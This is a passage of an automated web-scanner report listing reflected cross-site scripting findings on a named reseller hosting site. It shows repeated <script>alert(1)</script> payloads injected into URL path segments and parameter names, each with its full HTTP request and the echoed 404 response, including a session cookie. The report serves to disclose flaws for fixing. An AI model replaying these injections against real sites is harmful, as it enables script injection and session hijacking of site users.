The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload eb4ee<script>alert(1)</script>a57a69e68c9 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/3half.gifeb4ee<script>alert(1)</script>a57a69e68c9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/3half.gifeb4ee<script>alert(1)</script>a57a69e68c9 was not found on this server.</p>
...[SNIP]...

2.5555. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7b4c<script>alert(1)</script>32ff5b607c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/3half.gif?e7b4c<script>alert(1)</script>32ff5b607c4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/3half.gif?e7b4c<script>alert(1)</script>32ff5b607c4=1 was not found on this server.</p>
...[SNIP]...

2.5556. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a931<script>alert(1)</script>f4d38f348ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service1a931<script>alert(1)</script>f4d38f348ee/web-hosting/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service1a931<script>alert(1)</script>f4d38f348ee/web-hosting/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5557. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c3cc<script>alert(1)</script>41160c19fae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting9c3cc<script>alert(1)</script>41160c19fae/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting9c3cc<script>alert(1)</script>41160c19fae/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5558. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e0d7f<script>alert(1)</script>2721c7e7bdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themese0d7f<script>alert(1)</script>2721c7e7bdf/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themese0d7f<script>alert(1)</script>2721c7e7bdf/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5559. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75aed<script>alert(1)</script>6250f1d8c8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos75aed<script>alert(1)</script>6250f1d8c8b/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos75aed<script>alert(1)</script>6250f1d8c8b/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5560. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aa084<script>alert(1)</script>d6ee738c747 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesaa084<script>alert(1)</script>d6ee738c747/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesaa084<script>alert(1)</script>d6ee738c747/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5561. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 10584<script>alert(1)</script>9f2bf20e3e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating10584<script>alert(1)</script>9f2bf20e3e/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating10584<script>alert(1)</script>9f2bf20e3e/4half.gif was not found on this server.</p>
...[SNIP]...

2.5562. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 39908<script>alert(1)</script>b2d1affee2c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/4half.gif39908<script>alert(1)</script>b2d1affee2c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/4half.gif39908<script>alert(1)</script>b2d1affee2c was not found on this server.</p>
...[SNIP]...

2.5563. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d354<script>alert(1)</script>c484224c22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/4half.gif?3d354<script>alert(1)</script>c484224c22b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/4half.gif?3d354<script>alert(1)</script>c484224c22b=1 was not found on this server.</p>
...[SNIP]...

2.5564. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b85e<script>alert(1)</script>922f5a08217 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service2b85e<script>alert(1)</script>922f5a08217/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service2b85e<script>alert(1)</script>922f5a08217/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5565. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23bc4<script>alert(1)</script>7841efa4017 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting23bc4<script>alert(1)</script>7841efa4017/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting23bc4<script>alert(1)</script>7841efa4017/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5566. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c4af6<script>alert(1)</script>a87db5150b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesc4af6<script>alert(1)</script>a87db5150b7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesc4af6<script>alert(1)</script>a87db5150b7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5567. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38db3<script>alert(1)</script>90729673ba5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos38db3<script>alert(1)</script>90729673ba5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos38db3<script>alert(1)</script>90729673ba5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5568. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2793<script>alert(1)</script>f89b4be5dc3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesc2793<script>alert(1)</script>f89b4be5dc3/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesc2793<script>alert(1)</script>f89b4be5dc3/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5569. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e9d70<script>alert(1)</script>e22ceabe0c8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/ratinge9d70<script>alert(1)</script>e22ceabe0c8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/ratinge9d70<script>alert(1)</script>e22ceabe0c8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5570. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c11ba<script>alert(1)</script>36b7b56863d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.phpc11ba<script>alert(1)</script>36b7b56863d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.phpc11ba<script>alert(1)</script>36b7b56863d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5571. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bf244<a>bde21e7ea60 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbf244<a>bde21e7ea60&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbf244<a>bde21e7ea60&opt=2 was not found on this server.</p>
...[SNIP]...

2.5572. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

